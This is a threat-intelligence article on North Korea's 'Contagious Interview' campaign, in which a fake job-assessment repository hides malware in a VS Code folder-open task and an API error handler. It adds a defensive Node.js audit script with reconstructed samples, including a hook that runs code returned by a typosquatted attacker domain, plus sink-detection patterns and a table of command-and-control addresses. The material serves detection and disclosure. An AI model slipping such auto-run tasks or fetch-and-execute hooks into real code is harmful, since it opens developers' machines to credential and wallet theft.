A newly documented campaign dubbed “Contagious Interview” shows North Korean threat actors weaponising developer tooling and code-repository workflows to steal credentials and cryptocurrency wallet data and to establish remote access, even when victims never “run” the code they are sent.
In a recent case analysed by SEAL, a malicious Bitbucket repository (hxxps://bitbucket[.]org/0xmvptechlab/ctrading) was delivered as a take‑home technical assessment to a developer via LinkedIn.
Over the past month alone, three separate victims contacted SEAL after suffering significant financial losses, all following an almost identical social‑engineering script and technical footprint.
At the core of the campaign is a “dual‑stack” malware architecture combining a Node.js layer (BeaverTail) and a Python layer (InvisibleFerret variant).
Similar lures were sent as “code review” or “partnership” requests to security researchers and company engineers, using compromised or fabricated recruiter personas with large follower counts.
Inside the “Contagious Interview” operation
The Node.js component executes immediately upon infection, stealing credentials, logging keystrokes, looting LevelDB browser and wallet data, and spinning up a covert RAT under the victim’s ~/.npm directory.
It drops or uses multiple modules: a keylogger and screenshotter that exfiltrate to 172.86.116.178, a file grabber focused on developer secrets (.env, .ssh, wallet and config paths), a clipboard clipper for crypto addresses, a browser credential stealer and a full socket‑based remote shell.
The Python layer, staged via an obfuscated “.nlp” script, establishes a parallel surveillance stack under ~/.n2 and ~/.n3.
The primary module, way.py, acts as a RAT and wallet stealer, killing Chrome/Brave to release locks on LevelDB so the Node.js side can copy active wallet databases into a hidden staging folder.
A second module, pow.py, focuses on coin mining and persistence on Windows, abusing Startup folder scripts, a “Runtime Broker” scheduled task and Windows Defender exclusion rules to keep an XMRig miner (masquerading as msedge.exe) alive across reboots.
On Linux and macOS, pow.py fails early due to Windows‑specific imports, limiting automated persistence but not the initial theft.
Initial access is achieved through tightly integrated “code abuse” rather than traditional exploits. The ctrading project embeds malware through three vectors, two of which were actively used: a VS Code Task Hijack and an application‑logic hook.
A hidden .vscode/tasks.json entry labelled “eslint-check” is configured with "runOptions": { "runOn": "folderOpen" }, so VS Code runs it as soon as the folder is opened in a trusted workspace, and its command points directly to a JavaScript payload disguised as a font file (public/font/fa-brands-regular.woff2).
Job interviews become malware traps
For targets who avoid automatic tasks, a fallback trigger lives in server/routes/api/profile.js, where a getPassport function contacts a typosquatted domain (chainlink-api-v3[.]com) and passes the HTTP error body to new Function(), compiling and executing whatever JavaScript the attacker’s server returns.
A third vector, an npm dependency (grayavatar) that abuses child_process to execute obfuscated JavaScript, appears to be an artefact from earlier campaigns and was removed from npm at the time of analysis.
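The two access vectors above can be caught before a repository is ever opened in an IDE. The following is an added example, not code from SEAL’s report or from the ctrading repository: a small Node.js audit that parses .vscode/tasks.json for folderOpen tasks (flagging interpreters handed asset files such as .woff2 or inline code via -e) and greps source files for dynamic-code sinks (new Function, eval, child_process). The sample tasks.json and profile.js embedded below are constructed to mirror the report’s description; the exact task command and the body of getPassport are assumptions, and the regex scan lists lines for review rather than proving taint reaches the sink.

```javascript
'use strict';
// Added example (not SEAL's or the ctrading project's code): pre-open audit of an
// untrusted repository for the two access vectors described in the report.

// tasks.json is JSONC: VS Code accepts // and /* */ comments and trailing commas,
// which JSON.parse rejects. Simplified stripper: whole-line // comments, block
// comments and trailing commas before } or ] are removed before parsing.
function parseJsonc(text) {
  const noBlock = text.replace(/\/\*[\s\S]*?\*\//g, '');
  const noLine = noBlock.split('\n').filter(l => !l.trim().startsWith('//')).join('\n');
  return JSON.parse(noLine.replace(/,(\s*[}\]])/g, '$1'));
}

// File types an interpreter should never be handed; a script hidden as a font
// is exactly the trick used for public/font/fa-brands-regular.woff2.
const ASSET_EXT = /\.(woff2?|ttf|otf|png|jpe?g|gif|svg|ico|mp3|wav)$/i;
const INTERPRETER = /\b(node|python3?|sh|bash|zsh|pwsh|powershell|cmd)(\.exe)?$/i;

// Every task that fires automatically on folder open, with the reasons it is suspicious.
function findAutoRunTasks(tasksJsonText) {
  const doc = parseJsonc(tasksJsonText);
  const hits = [];
  for (const t of doc.tasks || []) {
    if (!t.runOptions || t.runOptions.runOn !== 'folderOpen') continue;
    const args = Array.isArray(t.args) ? t.args.filter(a => typeof a === 'string') : [];
    const reasons = ['runs on folderOpen'];
    if (typeof t.command === 'string' && INTERPRETER.test(t.command)) {
      for (const a of args) {
        if (ASSET_EXT.test(a)) reasons.push(`interpreter given asset file ${a}`);
      }
      if (args.some(a => /^-[ec]$/.test(a))) reasons.push('inline code via -e/-c');
    }
    hits.push({ label: t.label, command: t.command, args, reasons });
  }
  return hits;
}

// Dynamic code construction sinks. The regex does not prove that network data
// reaches the sink; it lists the lines a reviewer must read before running anything.
const SINK = /\bnew\s+Function\s*\(|\beval\s*\(|\bchild_process\b|\bexecSync?\s*\(|\bspawn(Sync)?\s*\(/;

function findDynamicCodeSinks(sourceText) {
  const hits = [];
  sourceText.split('\n').forEach((line, i) => {
    if (SINK.test(line)) hits.push({ line: i + 1, text: line.trim() });
  });
  return hits;
}

// Audit a set of files keyed by repo-relative path (e.g. read via fs from a clone).
function auditRepo(files) {
  const report = { autoRunTasks: [], sinks: {} };
  for (const [p, text] of Object.entries(files)) {
    if (p.endsWith('.vscode/tasks.json')) report.autoRunTasks.push(...findAutoRunTasks(text));
    else if (/\.(c|m)?js$/.test(p)) {
      const s = findDynamicCodeSinks(text);
      if (s.length) report.sinks[p] = s;
    }
  }
  return report;
}

// Constructed tasks.json modelled on the report (label and payload path are from
// the report; the "node" command and "type" are assumptions).
const SAMPLE_TASKS = `{
  // hidden task: runs the "font" as JavaScript when the folder is opened
  "version": "2.0.0",
  "tasks": [
    {
      "label": "eslint-check",
      "type": "shell",
      "command": "node",
      "args": ["public/font/fa-brands-regular.woff2"],
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}`;

// Constructed approximation of the fallback hook; the request path is hypothetical.
const SAMPLE_PROFILE_JS = `const axios = require('axios');
const API_BASE = 'https://chainlink-api-v3.com'; // typosquat of the real Chainlink API host
async function getPassport(req, res) {
  try {
    const r = await axios.get(API_BASE + '/passport');
    return res.json(r.data);
  } catch (err) {
    // "error handling" that compiles and runs whatever body the server returned
    new Function(err.response.data)();
  }
}`;

const REPORT = auditRepo({
  '.vscode/tasks.json': SAMPLE_TASKS,
  'server/routes/api/profile.js': SAMPLE_PROFILE_JS,
});
console.log(JSON.stringify(REPORT, null, 2));
```

Run it against a fresh clone by reading each file into the object passed to auditRepo; any entry in autoRunTasks or sinks is a reason to read the repository in a text editor, not open it in VS Code.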
SEAL’s forensic review of filesystem artefacts, process lists and lock files shows the malware strongly prioritises one‑time theft of data, credentials and wallet contents over long‑term stable persistence, especially on non‑Windows platforms.
On Linux and macOS, execution is primarily in memory via node -e and Python processes under ~/.n2, coordinated with lock files such as ~/.npm/vhost.ctl and npm-compiler.log.
Nevertheless, each victim’s environment contained the same Indicators of Compromise, and commit metadata for the ctrading repository pointed consistently to a Korea Standard Time (UTC+9) configuration.
Attribution to DPRK operators is assessed with high confidence. The LinkedIn persona “John Meltzer” and the “Meta2140” project appear to be fully controlled by North Korean IT workers, with repository commit author “Pietro” (github.com/pietroETH, linked to multiple email aliases) overlapping with infrastructure and identities previously seen in the fraudulent “Ultra-X” project.
Combined with the infrastructure reuse, timezone artefacts and social‑engineering playbook, SEAL links this cluster to known DPRK IT activity dating back to at least early 2024.
For developers and security teams, the case is a stark reminder that simply cloning a repository and marking the folder as trusted in VS Code Workspace Trust can be enough to trigger code‑execution chains hidden in IDE tasks and application error handlers; no manual npm start is required.
Enforcing strict VS Code Workspace Trust controls (opening unsolicited code in Restricted Mode), disabling automatic tasks (task.allowAutomaticTasks set to off), and routinely scanning for hidden artefacts such as ~/.n2, ~/.n3, ~/.nlp and anomalous ~/.npm contents are now essential hygiene for anyone handling unsolicited code in a professional context.
IOCs
| URL / IP | Path | Port | Stage / Function |
|---|---|---|---|
| chainlink-api-v3.com | /api/service/token/… | 80 | Stage 1 & 5: Delivers JS payload via Error 404 |
| 146.70.253.107 | /client/5346/1014 | 1224 | Stage 2: Downloads Python Stager (.nlp) |
| 146.70.253.107 | /payload/5346/1014 | 1224 | Stage 3: Downloads RAT (way) |
| 146.70.253.107 | /brow/5346/1014 | 1224 | Stage 3: Downloads Miner (pow) |
| 146.70.253.107 | /keys | 2242 | RAT: Data exfiltration & Command channel |
| 172.86.116.178 | /api/service/process | 5918 | Node RAT: vhost.ctl communication |
| 172.86.116.178 | /upload | 5978 | Exfiltration: Screenshot/Clipboard upload |
